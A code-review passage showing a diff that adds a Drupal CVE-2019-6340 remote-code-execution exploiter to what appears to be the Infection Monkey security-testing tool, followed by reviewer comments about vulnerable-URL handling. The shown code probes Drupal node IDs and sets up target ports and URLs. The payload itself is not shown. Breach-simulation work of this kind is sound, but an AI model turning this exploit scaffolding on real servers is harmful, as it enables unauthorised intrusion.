monkey/infection_monkey/exploit/drupal.py

```diff
@@ -0,0 +1,175 @@
+"""
+Remote Code Execution on Drupal server - CVE-2019-6340
+Implementation is based on:
+    https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a.
+"""
+
+import logging
+import re
+import requests
+from urllib.parse import urljoin, urlparse
+from infection_monkey.exploit.web_rce import WebRCE
+
+__author__ = 'Ophir Harpaz'
+
+LOG = logging.getLogger(__name__)
+
+
+def remove_port(url):
+    parsed = urlparse(url)
+    with_port = f'{parsed.scheme}://{parsed.netloc}'
+    without_port = re.sub(':[0-9]+$', '', with_port)
+    return without_port
+
+
+def build_url(*args) -> str:
+    f = ''
+    for x in args:
+        f = urljoin(f, x)
+    return f
+
+
+def check_drupal_cache(r: requests.Response) -> bool:
+    """
+    Check if a response had the cache header.
+    """
+    return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'
+
+
+def find_articles(base_url: str, lower: int = 1, upper: int = 10):
+    """ Find a target article that does not 404 and is not cached """
+    articles = set()
+    while lower < upper:
+        u = build_url(base_url, str(lower))
+        r = requests.get(u)
+        if r.status_code == 200:  # found an article
+            articles.add(lower)
+        if check_drupal_cache(r):
+            LOG.info(f'Found a cached article at: {lower}, skipping')
+        lower += 1
+    return articles
+
+
+class DrupalExploiter(WebRCE):
+    _TARGET_OS_TYPE = ['linux', 'windows']
+    _EXPLOITED_SERVICE = 'Drupal Server'
+    DRUPAL_PORTS = [[80, False], [443, True]]
+
+    def __init__(self, host):
+        super(DrupalExploiter, self).__init__(host)
+
+    def get_exploit_config(self):
+        """
+        We override this function because the exploits requires a special extension in the URL, "node",
+        e.g. an exploited URL would be http://172.1.2.3:<port>/node/3.
+        :return: the Drupal exploit config
+        """
+        exploit_config = super(DrupalExploiter, self).get_exploit_config()
+        exploit_config['url_extensions'] = ['node/']
+        return exploit_config
+
+    def add_vulnerable_urls(self, potential_urls, stop_checking=False):
+        """
+        We need a specific implementation of this function in order to add the URLs *with the node IDs*.
+        We therefore check, for every potential URL, all possible node IDs.
+        :param potential_urls: Potentially-vulnerable URLs
+        :param stop_checking: Stop if one vulnerable URL is found
+        :return: None (in-place addition)
+        """
+        for url in potential_urls:
+            node_ids = find_articles(url)
+            if node_ids is None:
+                LOG.info('Could not find a Drupal node to attack')
+                continue
+            for node_id in node_ids:
+                node_url = build_url(url, str(node_id))
+                if self.check_if_exploitable(node_url):
+                    self.add_vuln_url(url)  # Where is this used?
```

Comment:
`vuln_urls` are used in security report and to check if host is exploitable in default workflow of `_exploit_host()`. If web server has no vulnerable url's, we presume it's not exploitable.

Reply:
Can you explain exactly what the change should be? How can the two be merged into one call?

Reply:
I looked into it and it's a bigger issue than just the Drupal exploit, this should be refactored for the whole WebRCE module.